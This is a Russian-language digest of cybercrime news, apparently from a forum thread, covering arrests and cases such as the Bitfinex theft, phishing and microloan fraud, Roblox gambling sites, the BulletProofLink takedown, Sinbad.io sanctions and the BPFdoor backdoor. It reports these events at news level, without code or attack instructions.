Российский гражданин Илья Лихтенштейн вместе со своей спутницей жизни, американкой Хизер Морган, дали согласие на компромиссное решение в рамках судебной процедуры, возбужденной против них по обвинению в кибернападении на криптовалютный обменник Bitfinex в 2016 году. Об этом, ссылаясь на документацию американской юстиции, в пятницу передало информагентство Reuters.
Согласно представленным свидетельствам, о принятии данного решения Лихтенштейн и Морган уведомят суд в Вашингтоне 3 августа, где их дело находится на рассмотрении.
В 1994 году Лихтенштейн эмигрировал в США с родителями и проживает там. Он обладает двойным гражданством - России и США, а его спутница - гражданкой Соединенных Штатов. В феврале 2022 года оба были арестованы в Нью-Йорке по подозрению в краже средств на сумму около $4,5 млрд в результате кибератаки на криптовалютный обменник Bitfinex в 2016 году. Позже суд принял решение перевезти Лихтенштейна и Морган из Нью-Йорка в Вашингтон для дальнейшего судебного расследования.
Министерство юстиции США ранее обнародовало информацию о том, что конфискованы биткойны, похищенные в ходе кибератаки на Bitfinex, на сумму эквивалентную $3,6 млрд. Предполагается, что для легализации криптовалюты супруги использовали множество методов, включая создание фиктивных личностей, депозитирование средств на счета криптовалютных бирж и теневых рынков с последующим их выводом, конвертацию биткойнов в другие типы виртуальной валюты, а также использование программного обеспечения для автоматизации транзакций, которое позволяет осуществлять множество операций в кратчайшие временные промежутки.
Читинец брал микрозаймы от имени москвичей и жителей Подмосковья.
Жителя Читы осудили на 2,5 года исправительных работ за совершение 40 фактов мошенничества. Также 31-летний мужчина обвиняется в двух покушениях на мошенничество и трёх преступлений, связанных со взломом охраняемой законом компьютерной информации.
Согласно материалам уголовного дела, читинец взламывал «личные кабинеты» одного из интернет-сайтов, после чего оформлял на имена граждан кредиты в микрофинансовых организациях. Еще таким же образом он взял десятки онлайн- займов. Суммы варьировались от семи до 14 тысяч рублей.
Сообщается, что граждане, от имени которых мошенник оформлял микрозаймы, проживают преимущественно в Москве и Московской области. Также они есть в Краснодарском крае и республике Адыгея.
Читинцу были назначены исправительные работы на два года и шесть месяцев. Кроме того, с его зарплаты будут удерживать 10% в пользу государства.
Незаконные онлайн-казино используют популярную видеоигру Roblox для вовлечения детей в азартные игры, что [подтверждено](https://news.sky.com/story/illegal- casinos-are-using-roblox-to-draw-children-into-online-gambling-13273519) расследованием Sky News. Платформы предоставляют доступ к слотам и блэкджеку, позволяя использовать внутриигровую валюту Robux для ставок. Выигрыши можно выводить в криптовалюте, которая затем конвертируется в реальные деньги.
Roblox, имеющий около 80 миллионов активных пользователей ежедневно, особенно популярен среди детей, из которых 42% младше 12 лет. Некоторые из казино, включая BloxFlip, Bloxmoon и RBLXWild, ежемесячно привлекают до 2,8 миллиона посетителей и обрабатывают миллионы фунтов в ставках. Доступ к казино остаётся практически неограниченным. Пользователи могут создавать аккаунты, подтверждая возраст только отметкой, без реальной проверки.
Шестнадцатилетний подросток Роберт, начавший играть на таких сайтах в возрасте 14 лет, рассказал, что потратил около 15 миллионов Robux, эквивалентных 150 тысячам фунтов. Он отметил, что увлечение азартными играми привлекло его адреналином и перспективой заработать дополнительные деньги.
По словам Роберта, сотрудники казино знали о несовершеннолетних пользователях, но игнорировали этот факт. Подросток, несмотря на прекращение участия в азартных играх, признаёт, что увлечение оставило свой след.
В чатах платформ Discord обсуждались возраста игроков, и модераторы признавали, что многие пользователи младше 18 лет. Некоторые игроки, делавшие ставки на миллионы Robux, получали символические статусы «Кит» и «Платиновый кит», несмотря на их открытые заявления о возрасте.
Механизм работы таких казино прост: после регистрации через Roblox-аккаунт пользователи получают возможность переводить Robux в виртуальные фишки для ставок. Фишки затем можно обменять обратно на Robux или конвертировать в криптовалюту. Sky News получила данные, свидетельствующие о том, что пользователи сайта Bloxmoon с момента запуска в конце 2022 года потеряли более 11,4 миллиона долларов.
После публикации результатов расследования Комиссия по азартным играм начала экстренное разбирательство и заблокировала доступ к указанным сайтам в Великобритании. Но казино Bloxmoon и RBLXWild быстро возобновили работу под новыми адресами. Представители Roblox заявили, что подобные казино не имеют никакого отношения к компании и нарушают правила использования платформы. Roblox активно сотрудничает с правоохранительными органами для преследования владельцев сайтов.
Родители пятерых детей подали коллективный иск против Roblox, обвиняя компанию в бездействии. Судебное разбирательство началось в сентябре 2024 года. Согласно материалам дела, Roblox была осведомлена о существовании таких казино с 2022 года, но только в октябре 2024 года инициировала юридические действия против них, обвиняя в нарушении авторских прав и условий использования платформы.
Эксперты подчёркивают, что отсутствие регуляции делает такие платформы особенно опасными для детей, подвергая их финансовым и психологическим рискам. Например, один из друзей Роберта угрожал покончить с собой после проигрыша 20 тысяч Robux на ставках. Кроме того, благотворительная организация YGAM отмечает, что раннее вовлечение в азартные игры увеличивает риск развития зависимости в будущем.
Незаконные казино продолжают работать, пользуясь пробелами в законодательстве. Эксперты призывают усилить полномочия регулирующих органов, чтобы отслеживать и привлекать к ответственности владельцев таких платформ.
Бюро общественной безопасности округа Хэнъян (провинция Хунань, КНР) раскрыло дело преступной группы «9.15», занимавшейся отмыванием денег через криптовалюты.
По данным ведомства, с 2018 года члены группировки получали средства от мошенничества и азартных игр, которые затем конвертировали в цифровую валюту и выводили в доллары США. Впоследствии деньги для легализации отправляли различным компаниям в КНР.
В совокупности злоумышленники отмыли до 40 млрд юаней ($5,5 млрд).
Правоохранители провели обыски в провинциях Хайнань, Гуандун, Фуцзянь, Цзянси и других, где обнаружили свыше 10 объектов по отмыванию денег. Изъяты более 100 мобильных телефонов и компьютеров, конфискованы 300 млн юаней ($41,8 млн).
Задержаны 93 подозреваемых члена группировки. Расследование продолжается.
source: mp.weixin.qq.com/s/1EHyqkKRd5HxPYXSaj19rg
В мире фиксируется всё больше киберпреступлений — подчас самых неожиданных. Например, таковым в Японии посчитали продажу отредактированных файлов сохранений для Pokemon Scarlet & Violet.
36-летний житель префектуры Киото был арестован за фальсификацию данных программного обеспечения Nintendo Switch. Казалось бы, мужчина никому не причинил вреда: просто продавал отредактированные файлы сохранений, содержащие самых дорогих покемонов в игре. Однако в Японии это попадает под действие закона о предотвращении недобросовестной конкуренции.
В ответ на полицейское расследование мужчина заявил: «Я сделал это, чтобы заработать на жизнь». Однако органы власти расследуют дело пристально, ведь обороты продаж фальсифицированных данных могут составлять миллионы иен. При этом служители закона уже отметили, что инструментарий для редактирования сохранений бесплатно доступен в интернете, и никаких особых навыков для работы с ним не требуется.
другой перевод
В Японии предположительно был арестован игрок в покемонов за продажу взломанных монет за деньги, которые там незаконно.
Разведение покемонов для соревновательных сражений может оказаться невероятно скучным занятием, поэтому так много игроков избегают традиционных методов в пользу мошенничества . Это стало спорной темой в фандоме, так как многие не считают этих взломанных монстров «законными покемонами», особенно в турнирах.
Эти обстоятельства побудили фанатов искать взломанных покемонов, у которых есть все необходимые им атрибуты. Оказывается, кто-то якобы предлагал эти услуги и был арестован.
По данным NHK (через Automaton), 36-летний Ёсихиро Ямакава был арестован в Киото по подозрению в торговле взломанными Покемоны онлайн. Они сделали это, манипулируя сохранениями в Pokemon Violet и создав шесть монет, которые были проданы за сумму, эквивалентную 30 долларам США.
Хотя это может показаться незначительным преступлением, оно противоречит японскому Закону о предотвращении недобросовестной конкуренции и предусматривает потенциальное наказание до пяти лет. в тюрьме.
Сообщается, что подозреваемый признался в предъявленных обвинениях, заявив: «Я сделал это, чтобы заработать на жизнь».
Взлом покемонов games нет ничего нового: это происходит со времен Red & Синий. На самом деле это проблема, которая присутствовала в механике неожиданной торговли в Pokemon Scarlet & Фиолетовый, и эта проблема, вероятно, не исчезнет в ближайшее время, даже в тех регионах, где это незаконно.
Будь то получение событийных покемонов, которые больше не доступны, или максимально исчерпанные конкурентоспособные звери, всегда будут спрос на взломанных покемонов вне зависимости от последствий.
Проект Tor объявил об официальном запуске WebTunnel — нового подключаемого транспорта, призванного обеспечить конфиденциальность пользователей сети. В отличие от obfs 4 он не шифрует трафик по собственной схеме, а выдает его за обычный HTTPS / WebSocket.
Для подключения к Tor уже два десятилетия используются мосты, полагающиеся на транспортные протоколы obfs3 и obfs4. Такие серверы не числятся в списке узлов, публикуемом на Tor Project, адреса пользователям приходится получать по запросу.
Не секрет, что возможности Tor зачастую используют злоумышленники. Подозрительные подключения можно выявить по фингерпринту (цифровому отпечатку), однако некоторые частные компании и даже страны (Китай, Иран) стали переходить на фильтрацию по белым спискам протоколов, по умолчанию блокируя все, что не выглядит, как обычный интернет-трафик.
Поскольку obfs4 использует нестандартное шифрование, подобный подход закрыл доступ к Tor не только преступникам, но и законопослушным гражданам. Технология [WebTunnel](https://blog.torproject.org/introducing-webtunnel- evading-censorship-by-hiding-in-plain-sight/) способна решить эту проблему: новый протокол имитирует HTTPS, и сторонний наблюдатель вполне может принять соединение за подобие WebSocket-связи.
«WebTunnel настолько схож с обычным веб-трафиком, что может сосуществовать с сайтом в той же сетевой конечной точке, то есть в том же домене, на том же IP-адресе и порту, — пишут участники Tor Project в блоге. — Это позволяет им делить стандарный обратный прокси, который будет перенаправлять обычный веб- трафик и WebTunnel на соответствующие серверы приложений. В результате при заходе на сайт посетитель увидит только его содержимое и не заметит секретного моста (WebTunnel)».
Click to expand...
Новинка позиционируется как альтернатива obfs4, доступная большинству пользователей Tor Browser. Согласно статистике torproject.org, в настоящее время по протоколу WebTunnel работают 65 мостовых релеев, которыми ежедневно пользуются порядка 800 юзеров. Такой доступ пока возможен далеко не везде — например, он отсутствует в некоторых провинциях Ирана.
Суд города Коннектикут приговорил жителя американского штата Миссури Лайелла Шампейна-младшего (Lyell Champagne Jr.) к трем годам тюрьмы за мошенничество с криптовалютами и фальсификацию налоговых деклараций.
С марта 2021 по апрель 2022 года мужчина получал от своего делового партнера Кристиана Гупты (Kristian Gupta) учетные данные с банковскими счетами жертв, утверждает прокуратура. По ее версии, Шампейн-младший использовал персональные идентификационные данные этих жертв для создания электронной почты и учетных записей на криптовалютной бирже, куда затем переводил деньги.
Обвиняемые пытались вовлечь в схему банковских инсайдеров, однако попытка оказалась неудачной, решила прокуратура. Федеральное бюро расследований (ФБР) и Налоговая служба США (IRS) сообщили, что с 2018 по 2021 год обвиняемые подавали декларации несуществующей компании Shireberk International, получив налоговый вычет на сумму $3 449 935.
Правоохранительные органы вернули пострадавшим большую часть украденных средств. В июне Шампейн-младший признал себя виновным в сговоре с целью совершения банковского мошенничества ради инвестиций в криптовалюты и предоставлении ложной налоговой информации. Суд наказал его тремя годами заключения в федеральной тюрьме. Сообщник Гупта признал вину еще в апреле. Ожидается, что суд вынесет ему приговор 19 сентября.
justice[.]gov/usao-ct/pr/missouri-man-sentenced-3-years-federal-prison-fraud- and-tax-offenses
Генеральная прокуратура направила в суд уголовное дело в отношении шести жителей Гомеля, которым инкриминировано хищение имущества путем модификации компьютерной информации в составе организованной группы, сообщает БЕЛТА со ссылкой на управление взаимодействия со СМИ и редакционной деятельности надзорного ведомства.
Согласно материалам дела, обвиняемые в 2021-2022 годах вступили в состав действовавшего на территории Беларуси преступного сообщества, которое специализировалось на хищении средств граждан с использованием фишинговых ссылок.
Обвиняемые преимущественно выполняли роль "воркеров": переписываясь в мессенджерах WhatsApp, Viber и Telegram с потерпевшими, они направляли пользователям торговой площадки фишинговую ссылку якобы для оплаты приобретаемого товара. После перехода по ссылке гражданам предлагалось ввести реквизиты своих банковских платежных карт. Это, в свою очередь, позволяло участникам организованных групп неправомерно завладеть реквизитами и похитить деньги.
Примечательно, что один из обвиняемых одновременно состоял в двух организованных группах.
Всего обвиняемые похитили свыше Br49 тыс. более чем у 90 потерпевших.
Изучение материалов уголовного дела показало, что предварительное расследование по нему проведено всесторонне, полно и объективно, противоправные действия обвиняемых верно квалифицированы по ч.4 ст.212 УК.
Как отметили в надзорном ведомстве, мера пресечения в виде заключения под стражу в отношении всех обвиняемых применена правильно, оснований для ее изменения либо отмены нет.
В короткий промежуток времени в дежурную часть отдела МВД России по городу Саяногорску Республики Хакасия обратились сразу несколько пожилых граждан с заявлениями о совершённых в отношении них мошеннических действиях. Полицейские выяснили, что все они были обмануты телефонными аферистами, действовавшими по схеме «Ваш родственник попал в ДТП».
Все пенсионеры поверили позвонившим им злоумышленникам, что их родные якобы стали виновниками серьёзных аварий. Под предлогом непривлечения близких к уголовной ответственности мошенники потребовали от собеседников различные денежные суммы. По показаниям потерпевших и составленному фотороботу сыщики пришли к выводу, что за сбережениями к ним домой приходил один и тот же молодой человек.
Сотрудники уголовного розыска просмотрели записи камер видеонаблюдения, которые запечатлели посыльного, а также маршрут его передвижения и банкоматы, через которые тот переводил похищенную наличность.
В результате оперативно-розыскных мероприятий помощник аферистов был задержан полицейскими в городе Черногорске. Им оказался 17-летний житель посёлка Шушенское Красноярского края, учащийся одного из средне-специальных учебных заведений.
Полицейские установили причастность несовершеннолетнего к четырём телефонным мошенничествам, совершённым в Саяногорске и Абакане Республики Хакасия, а также к одному эпизоду преступной деятельности в Минусинске Красноярского края. В общей сложности потерпевшие отдали подростку более 1 млн 700 тысяч рублей, которые тот перевёл нанимателям.
По каждому факту возбуждено уголовное дело по статье 159 Уголовного кодекса Российской Федерации. До избрания меры пресечения фигурант задержан в порядке статьи 91 УПК РФ. Расследование продолжается.
Злоумышленники размещали объявления о продаже нерастаможенных автомобилей на популярных онлайн-платформах по заниженной стоимости, получали деньги от покупателей, а затем прерывали связь.
Следователи отделения полиции № 4 (г. Сумы) Сумского районного управления полиции во взаимодействии с отделом противодействия киберпреступлениям в Сумской области ГКП Национальной полиции Украины и сотрудниками ГУ «Сумской следственный изолятор» под процессуальным руководством Сумской областной прокуратуры сообщили о подозрении девяти лицам.
По данным следствия, четверо жителей Сумщины, отбывая наказание в ГУ «Сумской следственный изолятор» за совершение имущественных преступлений, с помощью интернет-ресурсов, публиковали ложные объявления о продаже и доставке авто на иностранных номерах. Объявления в разное время выявляли потерпевшие и, желая приобрести транспортные средства, осуществляли телефонный звонок на указанный номер телефона. В ходе общения с потерпевшими злоумышленники вводили их в заблуждение и предлагали перечислить на карту аванс или полностью оплатить автомобиль.
Кроме того, к противоправной деятельности подозреваемые привлекли еще пять человек, находившихся на свободе. Они обеспечивали заключенных связью и выполняли банковские операции со средствами обманутых граждан.
Сейчас установлено 22 пострадавших, в том числе военнослужащих ВСУ, которых успели обмануть правонарушители. Общая сумма потерянных средств составляет около 265 тысяч гривен.
Всем фигурантам объявлено о подозрении по ч. 3 и ч. 5 ст. 190 (мошенничество, совершенное в особо крупных размерах или организованной группой) Уголовного кодекса Украины. Санкция статьи предусматривает наказание в виде лишения свободы на срок от пяти до двенадцати лет с конфискацией имущества. Досудебное следствие продолжается, устанавливается точное количество пострадавших от преступной деятельности подозреваемых.
29 ноября OFAC внесло в санкционный список криптовалютный сервис микширования Sinbad.io за отмывание активов северокорейской группировки Lazarus.
По данным ведомства, миксер обработал миллионы долларов в криптовалютах, полученных в том числе в результате хакерских атак на кроссчейн-мост Horizon протокола Harmony, задействованный в блокчейн-игре Axie Infinity сайдчейн Ronin и кошелек Atomic Wallet. Совокупный ущерб от этих трех взломов составил примерно $820 млн.
Кроме того, Sinbad.io использовался для уклонения от санкций, оплату наркотиков, материалов о сексуальном насилии над детьми и других покупок в даркнете.
Власти США считают, что сервис оказывал материальную и технологическую поддержку правительству КНДР, а также помогал направленной на США киберпреступной деятельности.
OFAC заблокировало любую собственность Sinbad.io в пределах границ США. Резидентам и гражданам страны запрещено работать с ним. Иностранные финансовые учреждения также находятся под угрозой санкций за проведение операций в пользу Sinbad.io.
Два биткоин-адреса миксера включены в SDN.
Работа Sinbad.io остановлена 27 ноября после конфискации серверов в Нидерландах и Финляндии.
По оценкам FIOD, только за 2023 год миксер отмыл криптовалюты на сумму не менее $178 млн. Более 50% всех проходивших через сервис активов имеют криминальное происхождение.
Напомним, Sinbad стал основным миксером для отмывания криптовалют группировки Lazarus после блокировки Blender и Tornado Cash.
Сами хакеры находятся под санкциями США с сентября 2019 года.
В апреле 2023 года Минфин США вычислил трех внебиржевых трейдеров, которые проводили криптовалютные сделки на десятки миллионов долларов для Lazarus.
• Source: hххps://ofac.treasury.gov/recent-actions/20231129
• Source: hххps://home.treasury.gov/news/press-releases/jy1933
• Source:hххps://www.fiod.nl/fiod-takes-large-crypto-currency-mixer-off-the- air/
Полиция Малайзии арестовала восемь подозреваемых, включая главного администратора, и закрыла фишинговую платформу BulletProftLink, действовавшую с 2015 года.
Чурлики-бурлики предоставляли услуги PhaaS, предоставляя инфраструктуру для фишинга за $2000 в месяц.
В 2021 году на её серверах было более 100 000 фишинговых сайтов. К числу апреля 2023 года зарегистрированных пользователей достигло 8138, с шаблонами для 327 брендов.
Закрытие произошло при поддержке ФБР и полиции Австралии. Власти Малайзии изъяли криптовалюту на $213 000!!, серверы, компьютеры, автомобили и ювелирку.
Аресты лидеров платформы и изъятие активов помогли навсегда поставить точку в борьбе с фишерами.
В Малайзии полиция объявила о ликвидации PhaaS-сервиса (Phishing-as-a-Service, Фишинг-как-услуга) под названием BulletProofLink. Реализация операции прошла 6 ноября 2023 года при поддержке полиции Австралии и ФБР США.
8 человек в возрасте от 29 до 56 лет, включая главу синдиката, были арестованы в разных регионах Малайзии. Вместе с арестами власти конфисковали серверы, компьютеры, ювелирные изделия, транспортные средства и криптовалютные кошельки на сумму около $213 000.
Сервис BulletProofLink предлагал готовые шаблоны фишинга по подписке для проведения кампаний по сбору учетных данных. Шаблоны имитировали страницы входа известных сервисов, таких как American Express, Bank of America, DHL, Microsoft и Naver. По данным Microsoft, которая первая обнаружила сервис, партнёры BulletProofLink также занимались двойными кражами – украденные учетные данные отправлялись и разработчикам, и их клиентам, что открывало дополнительные пути монетизации.
Панель управления BulletProftLink
Компания Intel 471 отмечает, что BulletProftLink связан с хакером под псевдонимом AnthraxBP (TheGreenMY, AnthraxLinkers). Считается, что BulletProftLink активен с 2015 года, онлайн-магазин насчитывает не менее 8138 активных клиентов и 327 шаблонов фишинговых страниц по состоянию на апрель 2023 года.
Особенностью платформы является использование фишингового комплекта Evilginx2 для организации атак типа Adversary-in-The-Middle (AiTM-атака), позволяющих украсть сессионные куки и обойти многофакторную аутентификацию (multi-factor authentication, MFA).
Компания Trend Micro отмечает, что фишеры все чаще используют новые методы и более сложные подходы для обхода мер безопасности, включая промежуточные ссылки на документы, размещенные файлообменниках, содержащие URL-адреса инфраструктуры противника.
• Минцифры РФ предлагает наделить Роскомнадзор полномочиями блокировать сайты
с информацией об обходе блокировок в России.
• Проект постановления правительства РФ опубликован на портале проектов
нормативных правовых актов.
• Планируется внести изменения в критерии оценки материалов и информации для
принятия решений о блокировке сайтов.
• Обсуждение проекта будет проходить до 15 сентября.
• В декабре 2022 года были утверждены изменения в правилах работы Единого
реестра запрещенной информации, включая "ЛГБТ-пропаганду" и "информацию,
пропагандирующую педофилию или смену пола".
• За 2022 год Роскомнадзор внес в реестр более 384 тыс. ссылок.

обходу ограничений ](https://tass.ru/obschestvo/18645683)
Минцифры подготовило соответствующий проект постановления правительства
tass.ru
Оперативники нигерийской полиции подтвердили арест двух предполагаемых преступников, которые специализировались на взломе банковских счетов и краже денег из любых банков страны. Портал Information Nigeria уточняет что это стало следствием жалобы, которую еще в мае 2023 года направил силовикам крупный банк United Bank for Africa.
В том документе говорилось о том, что на территории Нигерии существуют целые синдикаты, специализирующиеся на интернет-мошенничестве и незаконном взломе банковских аккаунтах. В United Bank for Africa пожаловались, что чаще всего эта проблема возникает как раз со счетами их клиентов.
Сформированная специальная группа в результате продолжительной операции вышла на двух жителей города Иджебу-Одэ (штат Огун). После ареста они дали признательные показания, подтвердив, что управляли разветвленной сетью кибервзломщиков. При этом точный способ перехвата аккаунтов не называется, известно лишь, что для этого использовалось специальное программное обеспечение.
Пока что подтвержден взлом как минимум тысячи аккаунтов по всей стране. В полиции уточняют, что это число почти наверняка возрастет. Сейчас перед силовиками стоит задача найти остальных членов разветвленной группировки. Общая сумма украденных ими денег пока не разглашается.
source: informationng.com/2023/07/police-arrest-two-for-hacking- over-1000-bank-customers-accounts.html
Киберпреступники пытаются втягивать школьников в кибератаки, предлагая подзаработать на незаконной деятельности в цифровом пространстве. В частности, у подростков есть возможность поучаствовать в кардинге, хактивизме с политическим уклоном и распространении вредоносных программ.
По словам специалиста компании «РТК-Солар» Олега Седова, речь идёт о неких партизанских кибердружинах, членами которых могут стать школьники. В беседе с «Известиями» Седов отметил, что для участия в преступных схемах подростки должны установить у себя вредоносную программу, которая объединяет их в бот- сеть.
Проанализировав предложения матёрых киберпреступников, эксперты сделали вывод, что среди них есть хорошие психологи. Иначе нельзя объяснить фактически безупречное попадание в нужную злоумышленникам аудиторию.
Зачастую подростки просто хотят применить свои ИТ-навыки на практике. Например, ради интереса попробовать что-то взломать. Однако специалисты напоминают: даже проникновение в аккаунт одноклассника является уголовным преступлением.
Изучение материалов, мошеннических схем, а также получение готовых вредоносных программ для DDoS-атак или фишинга — всё это происходит в закрытых чатах, Telegram-ботах или на форумах в дарквебе.
Тяга к знаниям и экспериментам не всегда доводит юных любителей ИТ до положительных результатов. По словам исследователей, некоторые подростки выводят из строя собственные компьютеры, пытаясь запустить свою же вредоносную программу. Более того, молодёжь любит хвастаться, поэтому записывает на видео свои «подвиги» и выкладывает всё это в Сеть. Так школьники выдают себя.
Эксперт компании «Газинформсервис» Григорий Ковшов рассказал об опасности данной схемы взаимодействия со злоумышленниками:
«Прежде всего необходимо доносить до детей, что хакерство — это серьёзное преступление. Сегодня на форумах, где активно представлены в том числе и киберпреступники, идёт обсуждение перспектив нелегальной работы для школьников. Злоумышленники стараются переманить на «темную сторону» молодых и даже юных пользователей, погружённых или только интересующихся сферой ИТ.
Совершенно очевидно, что в даркнете нельзя найти законную, перспективную и высокооплачиваемую работу. Что касается подработок, то они тоже могут обернуться проблемами, так как профессиональные кибермошенники редко нанимают людей «с улицы», скорее всего школьников просто втягивают в очередную схему и используют в «темную». В итоге — мало того, что их могут привлечь к противоправной деятельности, так ещё и вряд ли заплатят за участие в мошеннических схемах.
Будьте бдительны и помните — информационная безопасность в наших с вами руках».
Click to expand...
В список жертв мошенников входят нефтегазовые компании в Юго-Восточной Азии, на Ближнем Востоке и в Северной Африке.
Интерпол арестовал трех нигерийцев в Лагосе в рамках международной операции под кодовым названием Killer Bee. Мужчины подозреваются в использовании Agent Tesla RAT для перенаправления финансовых операций и кражи конфиденциальных данных корпоративных организаций. У подозреваемых полиция обнаружила поддельные документы, включая счета-фактуры и официальные письма.
Agent Tesla, впервые обнаруженный в конце 2014 года, является чрезвычайно популярным трояном удаленного доступа (RAT), используемым злоумышленниками для кражи учетных данных, кейлоггинга, сбора данных буфера обмена и другой информации у жертв. Киберпреступные группировки и хакеры, занимающиеся шпионажем, используют Agent Tesla из-за его стабильности, гибкости и функциональности.
В операции Killer Bee участвовали штаб-квартира Генерального секретариата Интерпола, национальное центральное бюро и правоохранительные органы из 11 стран Юго-Восточной Азии.
Один из мошенников, Хендрикс Оморуме, был обвинен и осужден по трем эпизодам серьезного финансового мошенничества, ему грозит год тюрьмы. Двое других нигерийцев находятся под судом.
"Благодаря глобальной полицейской сети и постоянному мониторингу киберпространства Интерпол располагает необходимыми данными, чтобы предупредить Нигерию о серьезной угрозе безопасности, где миллионы могли быть потеряны без оперативных действий полиции", – заявил директор Интерпола по киберпреступности Крейг Джонс. "По мере поступления оперативной информации и проведения расследований ожидаются новые аресты злоумышленников по всему миру".
6 мая Национальная полиция сообщила, что в Винницкой области разоблачили группу хакеров, которые осуществляли фишинговые атаки на зарубежные банки. Также злоумышленники обворовывали карточки и украинцев.
Согласно данным киберполиции, группировка разработала схему привлечения пользователей на фальшивые сайты банковских учреждений.
Для этого злоумышленники сперва создали так называемые фишинговые сайты – порталы, точные копии сайтов реальных иностранных банков.
После этого запустилась активная рекламная кампания в поисковиках, причем ссылки в объявлениях вели именно на сайты-фальшивки. Кроме того, благодаря вложению значительных средств в "раскрутку" сайты-подделки оказывались на верхних позициях в результатах поиска.
Рядовые граждане переходили на сайт, как они полагали, своего банка. Там они вводили финансовую информацию для управления счетами. Информацию перехватывали злоумышленники и воровали все средства с карточек пользователей.
Следствие также выявило еще один метод кибермошенничества, который применил один из членов группировки - 29-летний житель села Якушинцы Винницкой области.
Парень в Даркнете покупал файлы HTTP-cookie – маленькие файлы, которые хранятся на компьютерах пользователей и содержат данные для входа на разные сайты. Эти файлы злоумышленник использовал, чтобы обворовать граждан на 5 миллионов гривен.
Против хакеров открыто производство по части 2 статьи 361 Уголовного кодекса – несанкционированное вмешательство в работу информационных сетей. Если они будут признаны виновными, они могут оказаться в тюрьме на срок от 2 до 5 лет.
Недавно запущенная коллекция NFT под названием Rare Bears оказалась под ударом мошенников.
NFT-проект Rare Bears подвергся хакерской атаке. Злоумышленник разместил фишинговую ссылку на канале проекта в Discord, благодаря чему ему удалось украсть 179 невзаимозаменяемых токенов из различных коллекций, в том числе Rare Bears, CloneX, Azuki, «mfer» и 6 токенов LAND метавселенной The Sandbox. Об этом сообщила компания Peckshield.
Судя по транзакциям на кошельке злоумышленников, они практически сразу продавали полученные NFT. Это позволило им выручить 286 ETH, что по текущему курсу составляет более $795 000. Средства были сразу направлены на миксер транзакций Tornado Cash.
Команда Rare Bears рассказала, что хакер получил доступ к аккаунту модератора Discord проекта и разместил объявление о выпуске новых NFT. После перехода по ссылке пользователи теряли доступ к содержимому кошельков. При этом хакеры, получив доступ к Discord, заблокировали доступ к нему другим членам команды Rare Bears и отозвали у них любые права по управлению сервером, поэтому они не могли сообщить, что ссылка мошенническая.
Rare Bears заявили, что команда смогла восстановить контроль над сервером, удалив скомпрометированную учетную запись и передав право собственности на новую, и что сервер защищен от новой атаки.
source: twitter.com/PeckShieldAlert/status/1504340385673654273
как актуальны эти новости? Или есть что то получше
__
](https://www.securitylab.ru/news/526625.php)
Краткий обзор главных событий в мире ИБ за неделю.
 www.securitylab.ru
ИБ-исследователь Зак Эдвардс обнаружил, что на многих правительственных и
военных сайтах США, использующих домены .gov и .mil, размещен контент,
содержащий порнографию и различный спам, например, рекламу виагры, игровой
валюты для Roblox, генераторы подарочных карт Xbox и так далее.
Эдвардс быстро выяснил, что все эти сайты объединяло использование одного и
того же софта, предоставленного государственным подрядчиком Laserfiche. Эта
компания оказывает услуги ФБР, ЦРУ, Казначейству США, военным и другим
государственным органам.
Оказалось, что продукт Laserfiche Forms содержит уязвимость, которая позволяет
злоумышленникам размещать вредоносный и спамерский контент на авторитетных
государственных ресурсах. Так, исследователь отслеживал уязвимость более года
и обнаружил, что сайты сенатора США Джона Тестера
и [Национальной
гвардии
Миннесоты](https://web.archive.org/web/20210914181655/https:/webcache.googleusercontent.com/search?q=cache%3Acxm1jQe2uNEJ%3Ahttps%3A%2F%2Fminnesotanationalguard.ng.mil%2Fdocuments%2F2019%2F12%2Ffamily-
statement-for-sgt-kort-m-plantenberg.pdf+&cd=6&hl=en&ct=clnk&gl=u), к примеру,
направляли пользователей на ресурсы по продаже виаргры.
[](https://xakep.ru/wp- content/uploads/2021/09/359261/ExVkIoiVIAA4odL.jpg)
«Уязвимость использовалась для создания фишинговых приманок на доменах .gov и .mil, которые подталкивали посетителей к вредонсоным перенаправлениям и подвергали их риску использования других эксплоитов», — рассказывает Эдвардс.
Своими выводами о проблемах, найденных примерно на 50 различных государственных поддоменах, эксперт поделился в видео, а также показал уязвимость в действии.Click to expand...
Разработчики Laserfiche уже [выпустили
патч](https://support.laserfiche.com/kb/1014315/laserfiche-forms-portal-file-
upload-vulnerability) для этого бага, а также опубликовали инструкции о том,
как очистить сайт от спама. Согласно заявлению компании, корнем проблемы была
уязвимость, связанная с загрузкой файлов без аутентификации. Дело в том, что в
Laserfiche Forms есть общедоступная форма, которая допускает загрузку файлов.
К ней могут получить доступ неаутентифицированные пользователи, в итоге
загрузив файлы на чужой сайт и сделав контент доступным в сети.
Хотя большинство правительственных клиентов компании уже очистили свои ресурсы
от спама, Эдвардс
пишет, что
Laserfiche все же не устранила уязвимость во всех версиях своего продукта, и
некоторыми из них все еще злоупотребляют
хакеры. В
компании уверяют, что обновления безопасности для ряда предыдущих версий
Laserfiche Forms ожидаются в скором будущем.
Недавно экспертам попался на глаза бэкдор BPFdoor, которому удалось более пяти лет атаковать системы Linux и Solaris, оставаясь при этом незамеченным. С помощью этого вредоноса злоумышленники получали полный контроль над устройством, работающим на базе Linux/Unix.
BPFdoor предоставляет оператору возможность удалённо подключиться к Linux- шеллу. При этом бэкдору не требуются открытые порты, его нельзя остановить файрволами, а отправлять команды вредоносу можно с любого IP-адреса.
Фактически вся эта функциональность делает BPFdoor идеальным инструментом для корпоративного кибершпионажа и сложных атак. Вредонос может слушать один или несколько портов и принимать пакеты от одного или нескольких хостов.
Первые три буквы имени BPFdoor намекают на то, что бэкдор использует сниффер Berkeley Packet Filter, работающий на уровне сетевого интерфейса и способный просматривать весь трафик, а также отправлять пакеты по любому адресу.
Именно благодаря работе на низком уровне BPF обходит все правила межсетевых экранов. Как объясняют специалисты, бэкдор вполне можно портировать на BSD. Известно, что BPFdoor парсит пакеты ICMP, UDP и TCP, проверяя наличие в них паролей и других важных данных.
Вредонос отличается возможностью мониторить любые порты, даже если они заняты безобидными веб-серверами, FTP- и SSH-клиентами.
В техническом разборе BPFdoor исследователи отмечают интересные функциональные возможности, помогающие бэкдору уходить от детектирования. К слову, наиболее ранний образец BPFdoor, загруженный на VirusTotal, датируется августом 2018 года.
• Source: <https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux- backdoor-technical-analysis/>
СБУ заблокировала схему масштабных мошенничеств в телекоммуникациях в Хмельницкой области: почти 3 тысячи сим-карт и более десятка sim-банков обеспечивали анонимность международных звонков, убытки операторам и прибыли дельцам, сообщают в спецслужбе.
Службы безопасности Украины в Хмельницкой области разоблачили и заблокировали деятельность мошенников, которые «обошли» защиту украинских мобильных операторов в технологии международной телефонии.
